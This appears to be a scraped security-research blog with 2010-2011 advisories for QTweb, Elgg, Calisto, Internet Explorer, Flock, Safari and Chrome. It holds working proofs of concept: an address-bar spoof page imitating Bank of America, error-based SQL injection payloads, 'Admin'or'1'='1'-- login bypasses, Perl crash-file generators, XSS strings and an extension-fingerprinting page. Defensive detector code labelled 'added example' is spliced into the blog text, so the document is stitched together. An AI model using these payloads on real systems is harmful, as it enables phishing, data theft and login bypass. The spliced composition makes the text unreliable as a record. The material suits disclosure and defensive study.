An attacker can also compose a popup with the attributes toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0, which can likewise be used for spoof or phishing attacks. </div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_8Om_RjwwoqQ4bXd6xfs1ljAbREjGikVyj9hq6mz0BPhTBrJJjvBH0G_h3CqmgRW3_E8ZPPkm5UtQo_lSVfzTa5fV3TKGNzF9qylLxa4jI5PtcP0e-7okYPYVMPLMK-7qNYF7/s1600/qt2.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_8Om_RjwwoqQ4bXd6xfs1ljAbREjGikVyj9hq6mz0BPhTBrJJjvBH0G_h3CqmgRW3_E8ZPPkm5UtQo_lSVfzTa5fV3TKGNzF9qylLxa4jI5PtcP0e-7okYPYVMPLMK-7qNYF7/s400/qt2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Popup without toolbars and address bar</b></td></tr>
</tbody></table>
################<br />
Versions affected<br />
################<br />
<br />
QTweb 3.7.2 Vulnerable<br />
QTweb 3.7.3 (build 087) Vulnerable<br />
and possibly prior versions.<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>QTweb 3.7.2 and 3.7.3 (build 087) document.open() URL weakness Spoof testcase by Lostmon</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open(":#:","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><img src='data:image/gif;base64,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'/>");<br />
}<br />
</script><br />
</head><br />
<body><br />
<h1>QTweb 3.7.2 and 3.7.3 (build 087) document.open() URL weakness Spoof testcase by Lostmon</h1><br />
<noscript><p>this testcase requires JavaScript to run.</p></noscript><br />
<p>First Click in this link ==> <a href=":#:" onClick="invokePoC();" target="_blank">invoke PoC</a></p><br />
<p>and look at the result window: the address bar doesn't show the URL, <br />
and if you type any URL into the address bar, the browser does not navigate to it.<br />
This issue can be used to spoof sites or for phishing attacks.<br />
Safari 5.1 (7534.50)</p><br />
</body><br />
</html><br />
<br />
################<br />
Solution<br />
###############<br />
<br />
No solution at this time !!!<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered :Mar 30, 2011<br />
Vendor Notify: Sep 28, 2011<br />
Vendor response: XXXXX<br />
Vendor Patch: XXXXXX<br />
Public Disclosure: Oct 03, 2011<br />
<br />
########################## €nd ########################<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-81688359255955351022011-08-15T12:28:00.001-07:002011-08-15T12:30:42.809-07:00Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection##################################################<br />
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection<br />
Vendor URL: http://www.elgg.org/<br />
Advisory: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<br />
Elgg is an award-winning social networking engine, delivering<br />
the building blocks that enable businesses, schools, universities<br />
and associations to create their own fully-featured social networks<br />
and applications. Organizations with networks powered by Elgg<br />
include: Australian Government, British Government, Federal Canadian<br />
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,<br />
Johns Hopkins University and more (http://elgg.org/powering.php)<br />
<br />
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
Elgg contains a flaw that may allow an attacker to carry out an<br />
SQL injection attack. The issue is due to the script not properly<br />
sanitizing user-supplied input to the 'container_guid' and 'owner_guid'<br />
variables upon submission to 'mod/search/pages/search/index.php'. <br />
This may allow an attacker to inject or manipulate SQL queries<br />
in the backend database.<br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
Elgg 1.8 beta2 vulnerable <br />
Elgg 1.7.10 and prior versions vulnerable<br />
Elgg 1.7.11 not vulnerable<br />
<br />
#################<br />
Technical details<br />
#################<br />
<br />
The injection type is integer, and it can only be exploited via the<br />
MySQL error-based injection method; it works with<br />
'magic_quotes_gpc' set to 'on' or 'off'.<br />
<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<br />
If you know what error-based injection is... you know how to use it ;)<br />
<br />
URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'<br />
<br />
Injections:<br />
<br />
and(select 1 from(select count(*),concat((select (select %column_name%) from<br />
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from<br />
`information_schema`.tables<br />
group by x)a) and 1=1<br />
<br />
Count(table_name) of information_schema.tables where<br />
table_schema=0x74657374 is 75<br />
<br />
Count(column_name) of information_schema.columns where<br />
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4<br />
<br />
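As an added example (not Elgg's own code), a Python scan over constructed access-log lines: it applies the integer rule the search page should have enforced on container_guid and owner_guid before building SQL, and flags values carrying the error-based pattern shown above. The log format, client addresses and request paths are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters Elgg's search page expects to carry integer entity GUIDs.
GUID_PARAMS = ("container_guid", "owner_guid")

# Rule the page should have enforced before the value reached SQL:
# decimal digits and nothing else (a trailing quote, space or keyword fails).
GUID_RE = re.compile(r"[0-9]+")

# Markers of the MySQL error-based technique shown in the advisory:
# count(*) + floor(rand(0)*2) + group by forces a duplicate-key error
# that leaks the concatenated value, and information_schema is enumerated.
ERROR_BASED_SIG = re.compile(
    r"floor\s*\(\s*rand\s*\(|group\s+by|information_schema|count\s*\(\s*\*\s*\)",
    re.IGNORECASE,
)

# Request target out of an Apache combined-log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def is_valid_guid(value: str) -> bool:
    return GUID_RE.fullmatch(value) is not None


def classify_guid(value: str):
    """None for a clean GUID, otherwise a short reason for an alert."""
    if is_valid_guid(value):
        return None
    if ERROR_BASED_SIG.search(value):
        return "error-based MySQL injection signature"
    return "non-integer guid"


def scan_log(text: str) -> list:
    """Return (line number, parameter, decoded value, reason) for every
    container_guid / owner_guid value that fails the integer rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name not in GUID_PARAMS:
                continue
            reason = classify_guid(value)
            if reason:
                findings.append((lineno, name, value, reason))
    return findings


# Constructed sample log (not real traffic): a clean search, the single-quote
# probe from the advisory, the advisory's error-based payload URL-encoded,
# and a clean owner_guid search.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jul/2011:10:01:02 +0200] "GET /elgg/search/?q=someword&search_type=tags&container_guid=7826 HTTP/1.1" 200 5120
10.0.0.5 - - [30/Jul/2011:10:01:09 +0200] "GET /elgg/search/?q=someword&search_type=tags&container_guid=7826' HTTP/1.1" 500 812
10.0.0.5 - - [30/Jul/2011:10:01:15 +0200] "GET /elgg/search/?q=someword&search_type=tags&owner_guid=7826%20and(select%201%20from(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 500 812
10.0.0.9 - - [30/Jul/2011:10:02:00 +0200] "GET /elgg/search/?q=elgg&search_type=all&owner_guid=42 HTTP/1.1" 200 4410
"""

if __name__ == "__main__":
    for lineno, name, value, reason in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {name}={value!r}: {reason}")
```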
################<br />
Solution<br />
###############<br />
<br />
The vendor has released an updated version that solves this <br />
issue and others; see the changelog and update your Elgg <br />
installation to 1.7.11.<br />
<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered :July 30, 2011<br />
Vendor Notify:July 30, 2011<br />
Vendor response:July 30, 2011<br />
Vendor Patch: August 15, 2011<br />
Public Disclosure: August 15, 2011<br />
<br />
########################## €nd ########################<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-11612733854055088962011-08-11T14:09:00.004-07:002011-08-14T04:04:33.809-07:00Calisto Light, Light Plus and Full, SQL Injection and user or admin bypass##################################################<br />
Calisto Light, Light Plus and Full, SQL Injection and user or admin bypass<br />
Vendor URL: http://www.calistosoft.com.ar/<br />
Advisory: http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
<br />
##########################<br />
Vulnerability Description<br />
##########################<br />
<br />
Calisto Light, Light Plus and Full contain a flaw that may <br />
allow an attacker to carry out an SQL injection attack. The<br />
issue is due to the script not properly sanitizing user-supplied<br />
input to the 'usuario' form field and the 'txtEmail' param upon submission<br />
to 'login.aspx' and '/admin/loginAdmin.aspx'. This may allow an <br />
attacker to inject or manipulate SQL queries in the backend database.<br />
#################<br />
UPDATE 14/08/2011<br />
#################<br />
<br />
Detalle.aspx, Oferta.aspx, Categoria.aspx, contacto.aspx, <br />
marca.aspx, novedades.aspx, empresa.aspx, FAQ.aspx and Registracion.aspx<br />
are affected by this flaw too.<br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
Calisto Light<br />
Calisto Light plus<br />
Calisto Full<br />
<br />
######################<br />
Proof Of Concept<br />
######################<br />
<br />
This issue can be used to bypass admin validation or user validation.<br />
<br />
1- If an attacker writes in the 'Usuario' box:<br />
<br />
someword'or'1'='1'<br />
and clicks the login button, when the application posts to 'login.aspx' <br />
it shows a nice SQL warning, but if he writes:<br />
<br />
someword'or'1'='1'--<br />
<br />
it bypasses validation. If anyone knows a user's email, then he can <br />
log in as that user :) <br />
<br />
2- If an attacker writes in the 'usuario' box of the admin section:<br />
<br />
Admin'or'1'='1'--<br />
<br />
and clicks the login button, when the application posts to<br />
'/admin/loginAdmin.aspx' it bypasses admin validation. :)<br />
<br />
<br />
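As an added example (not Calistosoft's code), a sqlite3 stand-in for the login query: the string-concatenated form the advisory describes next to a parameterised version, both tried with the 'usuario' payloads above. The table and column names (usuarios, usuario, clave, rol) and the sample rows are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the shop's user table.
    Table, column names and rows are constructed for this demo;
    passwords are plaintext only to keep it short."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE usuarios (usuario TEXT, txtEmail TEXT, clave TEXT, rol TEXT)"
    )
    conn.executemany(
        "INSERT INTO usuarios VALUES (?, ?, ?, ?)",
        [
            ("Admin", "admin@example.invalid", "s3cret", "admin"),
            ("maria", "maria@example.invalid", "hunter2", "user"),
        ],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, usuario: str, clave: str) -> list:
    """Builds the WHERE clause by string concatenation, the pattern the advisory
    describes. Returns every (usuario, rol) row that matches; a login page
    written this way treats the first row as the authenticated user."""
    sql = (
        "SELECT usuario, rol FROM usuarios WHERE usuario = '" + usuario
        + "' AND clave = '" + clave + "'"
    )
    # With usuario = "someword'or'1'='1'--" the statement becomes
    #   ... WHERE usuario = 'someword' or '1'='1' --' AND clave = '...'
    # so the password check is commented out and every row matches.
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, usuario: str, clave: str) -> list:
    """Same query with bound parameters: the quote, OR and -- travel as data
    inside the usuario value and never become SQL syntax."""
    sql = "SELECT usuario, rol FROM usuarios WHERE usuario = ? AND clave = ?"
    return conn.execute(sql, (usuario, clave)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("someword'or'1'='1'--", "Admin'or'1'='1'--"):
        print("vulnerable:", payload, "->", login_vulnerable(db, payload, "wrong"))
        print("safe:      ", payload, "->", login_safe(db, payload, "wrong"))
```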
################<br />
Solution<br />
###############<br />
<br />
No solution was available at this time.<br />
I have sent four emails to Calistosoft via their web form<br />
and to the info and support mailboxes to get initial contact, but <br />
they haven't responded :(<br />
<br />
###############<br />
Timeline<br />
###############<br />
<br />
Discovered : 30-07-2011<br />
Vendor Notify: 7-08-2011<br />
Vendor response: no response.<br />
Workaround patch: no patch<br />
Vendor Patch: no patch<br />
Public Disclosure: 11-08-2011<br />
<br />
########################## €nd ########################<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77284822533405503852011-08-09T11:55:00.003-07:002011-08-09T12:30:19.272-07:00Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability#############################################<br />
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability<br />
Vendor URL: http://www.microsoft.com<br />
Advisory: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html<br />
Coordinated disclosure: YES exploit available: Private<br />
CVE-2011-1257 and MS11-057<br />
#############################################<br />
<br />
Microsoft Internet Explorer 6, 7 and 8 are vulnerable to remote code<br />
execution due to a race condition in the window.open<br />
JavaScript method.<br />
<br />
A remote attacker can compose a web page with malicious code,<br />
and when a victim visits this malformed web document the attacker can<br />
exploit this situation.<br />
<br />
<br />
######################<br />
Solution<br />
######################<br />
<br />
Microsoft has issued a bulletin with technical details about this issue<br />
under the identifier [MS11-057].<br />
<br />
You can find more details at this link:<br />
http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br />
<br />
Microsoft has also issued a patch that solves this vulnerability;<br />
see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br />
to update your system.<br />
<br />
############<br />
Timeline<br />
############<br />
<br />
Discovered : January 13, 2011<br />
Vendor Notify: January 19, 2011<br />
Vendor Response: January 19, 2011<br />
Vendor Patch: August 9, 2011<br />
Public Disclosure: August 9, 2011<br />
<br />
################# €nd #########################<br />
<br />
Thanks to Michal Zalewski for his extraordinary mind<br />
and knowledge; people like him should have a virtual<br />
statue for the rest of time.<br />
<br />
Thanks to Jack, Gerardo, Nate and all of MSRC<br />
for their support on this issue.<br />
<br />
Thanks to Microsoft Vulnerability Research (MSVR)<br />
for taking an interest in this issue and for coordinating<br />
disclosure with the other affected browsers.<br />
<br />
Thanks to all who believe in me, including you, Estrella :**<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50290692770803760972011-03-11T14:35:00.001-08:002011-03-11T14:35:34.985-08:00Multiple vulnerabilities in Flock Browser 3.0.0.3989#########################################<br />
Multiple vulnerabilities in Flock Browser 3.0.0.3989<br />
Vendor URL: http://beta.flock.com/<br />
Vendor advisories: http://www.flock.com/security/ <br />
Advisory: http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html<br />
Vendor notify: YES exploits available: YES<br />
######################################### <br />
<br />
Some stuff that I haven't published before, because I haven't had time; I'm studying and I need time to read books and study.<br />
<br />
Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based on an old Chromium release (5.0.375.75) and has multiple bugs imported from Chrome plus its own bugs :) <br />
I have contributed to securing the Flock browser; I have tested the version with the Google Chrome base. <br />
I made a list of all the issues I found, and the Flock team released some advisories about them some time later.<br />
<br />
###############<br />
TODO LIST / Bugs<br />
###############<br />
<ol><li> Inspector window attributes script injection, Chrome bug 31590</li>
<li> XSS in the search engine in chrome://history/, Chrome bug 13760 (not exploitable by remote attackers) (chrome://history/#q="><iframe src=javascript:alert(1)>&p=0) </li>
<li> XSS in the search box of the favorites page ( chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title) (not exploitable by remote attackers) </li>
<li> XSS in the search engine extension when pasting into the URL (chrome-extension://flock_people/search.html) (persistent XSS) (not exploitable by remote attackers) </li>
<li> XSS in the social extension when trying to log in to Facebook, Twitter or YouTube (not exploitable by remote attackers) </li>
<li> XSS in the RSS viewer's search box, chrome-extension://flock_people/feed_viewer.html?http://path_to_rss (not exploitable by remote attackers) </li>
<li> XSS in the RSS viewer when rendering XML from a remote host: if an entry contains HTML it is executed when the news is viewed through the Flock RSS viewer (exploitable via remote sites) (see for example my feed => chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml) and then if you type in the search box, for example " or <, it executes the XSS stored in the XML file again :) </li>
<li>window.open() method JavaScript Same-Origin Policy violation, Chrome bug 30660 </li>
<li>URL with a leading NULL byte can bypass cross-origin protection, Chrome bug 37383</li>
</ol><br />
<br />
###########################<br />
Advisores from Flock developers<br />
###########################<br />
<b>FLOCK-SA-2010-04</b><br />
<br />
Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4094<br />
CVEs (cve.mitre.org): CVE-2010-0661<br />
Details:<br />
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.<br />
<br />
Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).<br />
References: https://bugs.webkit.org/show_bug.cgi?id=32647<br />
http://code.google.com/p/chromium/issues/detail?id=30660<br />
<br />
<b>FLOCK-SA-2010-03</b><br />
<br />
Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4112<br />
CVEs (cve.mitre.org): CVE-2010-1236<br />
<br />
Details: <br />
A javascript: url with a leading NULL byte can bypass cross origin protection,<br />
which has unspecified impact and remote attack vectors.<br />
<br />
Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).<br />
References: https://bugs.webkit.org/show_bug.cgi?id=35948<br />
http://code.google.com/p/chromium/issues/detail?id=37383<br />
<br />
<b>FLOCK-SA-2010-02</b><br />
<br />
Title: A malicious RSS feed can bypass cross origin protection (XSS)<br />
Impact: High<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4114<br />
CVEs (cve.mitre.org): CVE-2010-3262<br />
<br />
Details: <br />
A malicious RSS feed containing HTML when viewed can bypass cross-origin protection,<br />
which has unspecified impact and remote attack vectors.<br />
Credit to Lostmon Lords.<br />
<br />
<b>FLOCK-SA-2010-01</b><br />
<br />
Title: A malformed favourite can bypass cross origin protection (XSS)<br />
Impact: Moderate<br />
Announced on: 2010-09-09<br />
Affected Products: Flock 3 versions prior to 3.0.0.4094<br />
CVEs (cve.mitre.org): CVE-2010-3202<br />
Details: <br />
A malformed favourite imported from an HTML file, imported from another browser,<br />
or manually created can bypass cross-origin protection, which has unspecified impact<br />
and attack vectors.<br />
Credit to Lostmon Lords.<br />
References: http://www.securityfocus.com/archive/1/513214<br />
################################################<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-67193764364557554622010-12-08T12:53:00.002-08:002010-12-09T13:27:17.182-08:00QTweb browser for windows 3.7(Build 063) CSS Denial of Service#########################################################<br />
QTweb browser for windows 3.7(Build 063) CSS Denial of Service<br />
Vendor URL: http://www.qtweb.net/<br />
Advisory: http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html<br />
Vendor notify: NO exploit available: YES<br />
##########################################################<br />
<br />
QTweb browser for Windows is prone to a denial of service<br />
condition. An attacker can exploit this issue to cause the <br />
affected browser to crash, effectively denying service to <br />
legitimate users.<br />
<br />
The following are vulnerable:<br />
<br />
QTweb for windows 3.7(Build 063)<br />
<br />
<br />
###########<br />
Sample PoC<br />
###########<br />
<br />
Generate the crash file and open it with the QTweb browser: it hangs, and after around one minute it crashes with an abnormal program termination.<br />
<br />
#!/usr/bin/perl<br />
#########################################################################<br />
# Title: QTweb browser for windows 3.7(Build 063) CSS Denial of Service PoC<br />
# Developer: http://www.qtweb.net/<br />
# Tested: Windows 7 Ultimate 32-bit<br />
#########################################################################<br />
use strict;<br />
use warnings;<br />
<br />
# Output file to open with QTweb<br />
my $file = "Crash_QTweb.html";<br />
# About 40 MB of junk as the value of a single bogus CSS property<br />
my $junk = "A/" x 20000016;<br />
open(my $FILE, '>', $file) or die "Cannot write $file: $!";<br />
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";<br />
print "\nCrash_QTweb.html File Created successfully\n";<br />
close($FILE);<br />
<br />
############################# EOF ############################<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-74143214580006365292010-12-08T12:44:00.001-08:002010-12-08T12:45:36.734-08:00Safari for windows 5.0.2(7533.18.5) CSS Denial of Service#########################################################<br />
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service<br />
Vendor URL:http://www.Apple.com<br />
Advisory: http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html<br />
Vendor notify: NO exploit available: YES<br />
##########################################################<br />
<br />
Safari for Windows is prone to a denial of service<br />
condition. An attacker can exploit this issue to cause the <br />
affected browser to crash, effectively denying service to <br />
legitimate users.<br />
<br />
The following are vulnerable:<br />
<br />
safari for windows 5.0.2(7533.18.5)<br />
<br />
<br />
###########<br />
Sample PoC<br />
###########<br />
<br />
Generate the crash file and open it with Safari: it hangs, and after around one minute it crashes<br />
with an abnormal program termination.<br />
<br />
#!/usr/bin/perl<br />
#########################################################################<br />
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC<br />
# Developer: http://www.Apple.com<br />
# Tested: Windows 7 Ultimate 32-bit<br />
#########################################################################<br />
use strict;<br />
use warnings;<br />
<br />
# Output file to open with Safari<br />
my $file = "Crash_safari.html";<br />
# About 40 MB of junk as the value of a single bogus CSS property<br />
my $junk = "A/" x 20000000;<br />
open(my $FILE, '>', $file) or die "Cannot write $file: $!";<br />
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";<br />
print "\nCrash_safari.html File Created successfully\n";<br />
close($FILE);<br />
<br />
############################# EOF ############################<br />
<br />
Regards:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....
Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-24065016144985177962010-09-07T05:20:00.003-07:002010-09-07T05:23:30.798-07:00Google Chrome Installed extensions arbitrary detection######################################################<br />
Google Chrome Installed extensions arbitrary detection<br />
Vendor url: http://www.google.com<br />
Advisory: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html<br />
Vendor notify: YES, vendor confirmed: YES, exploit: YES<br />
######################################################<br />
<br />
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
How safe is it to use extensions?<br />
An attacker can access extension resources via an iframe (at this moment I <br />
have not found a way to alter information from extensions).<br />
<br />
like <br />
>iframe<br />
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<<br />
for example...<br />
<br />
A remote user can modify this web doc and call it with the meta tag "base" <br />
in a malformed doc...<br />
<br />
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/"><br />
So I think that chrome-extension needs sanitization so that internal<br />
resources cannot be accessed from external web pages (file:/// and other protocol handlers<br />
are safe to use and don't give access to internal resources from external<br />
web docs...)<br />
<br />
So the chrome-extension protocol handler can be used to find the extensions installed<br />
on the client browser... and then if any extension is vulnerable to something,<br />
this information can be used to exploit that extension...<br />
<br />
In incognito mode extensions can be detected too<br />
<br />
###########################<br />
A sample PoC of detection <br />
###########################<br />
<br />
<html><br />
<head><br />
<title>Chrome extensions detector PoC By Lostmon</title><br />
</head><br />
<body><br />
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"<br />
onLoad="document.write('<br /><b>you have installed Gmail checker plus</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"<br />
onLoad="document.write('<br /><b>you have installed Web Developer</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"<br />
onLoad="document.write('<br /><b>you have installed My Shortcuts</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"<br />
onLoad="document.write('<br /><b>you have installed Firebug</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"<br />
onLoad="document.write('<br /><b>you have installed Webpage Screenshot</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"<br />
onLoad="document.write('<br /><b>you have installed Speed dial</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
<p><img src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"<br />
onLoad="document.write('<br /><b>you have installed Downloads</b>');"<br />
onError="document.write('<br /><b>File not found</b>');"></p><br />
</body><br />
</html><br />
<br />
####################EOF##########################<br />
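Added example, not part of this advisory: a scanner that a proxy or page-audit tool can run over served HTML to flag the probing pattern the PoC above relies on (an element whose src points at a chrome-extension:// resource and that carries onload/onerror handlers). The sample page is constructed from two of the PoC's own URLs.

```javascript
// Added example: flag chrome-extension:// resource references in HTML served
// from the web. A page on an http(s) origin has no legitimate reason to load
// another extension's icon, so each hit is worth logging as a fingerprint probe.

// Chrome extension IDs are 32 lowercase letters in the range a-p.
const EXT_ID = "[a-p]{32}";
// One attribute chunk: unquoted text, or a complete quoted value (so a
// document.write('<b>...</b>') inside onload="" does not end the tag early).
const ATTR_CHUNK = `(?:[^>"']|"[^"]*"|'[^']*')`;
const PROBE_RE = new RegExp(
  `<(img|iframe|script|link)\\b(${ATTR_CHUNK}*?)\\b(?:src|href)=["']chrome-extension://(${EXT_ID})/([^"']*)["'](${ATTR_CHUNK}*)>`,
  "gi"
);

// Returns one finding per element that references an extension resource.
// `handlers` lists the onload/onerror attributes on the element: with both
// present, the reference is a yes/no "is this extension installed" probe.
function findExtensionProbes(html) {
  const findings = [];
  for (const m of html.matchAll(PROBE_RE)) {
    const [, tag, before, extId, path, after] = m;
    const attrs = (before + " " + after).toLowerCase();
    findings.push({
      tag: tag.toLowerCase(),
      extId,
      path,
      handlers: ["onload", "onerror"].filter((h) => attrs.includes(h + "=")),
    });
  }
  return findings;
}

// Distinct extension IDs probed, and how many references carry handlers.
function summarise(findings) {
  const probedIds = [...new Set(findings.map((f) => f.extId))];
  const withHandlers = findings.filter((f) => f.handlers.length > 0).length;
  return { probedIds, probes: findings.length, withHandlers };
}

// Constructed sample: two entries in the shape of the PoC, plus a benign image.
const SAMPLE_HTML = `
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have installed Gmail checker plus</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have installed Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="https://example.invalid/logo.png" alt="benign"></p>
`;

console.log(JSON.stringify(summarise(findExtensionProbes(SAMPLE_HTML)), null, 2));
```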
<br />
##############<br />
Timeline<br />
##############<br />
<br />
Discovered: 27 may 2010<br />
Vendor notified: 01 jun 2010<br />
Vendor patch: 02 sep 2010<br />
Disclosure: 07 sep 2010<br />
<br />
#######################€ND ########################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
Sincerely:<br />
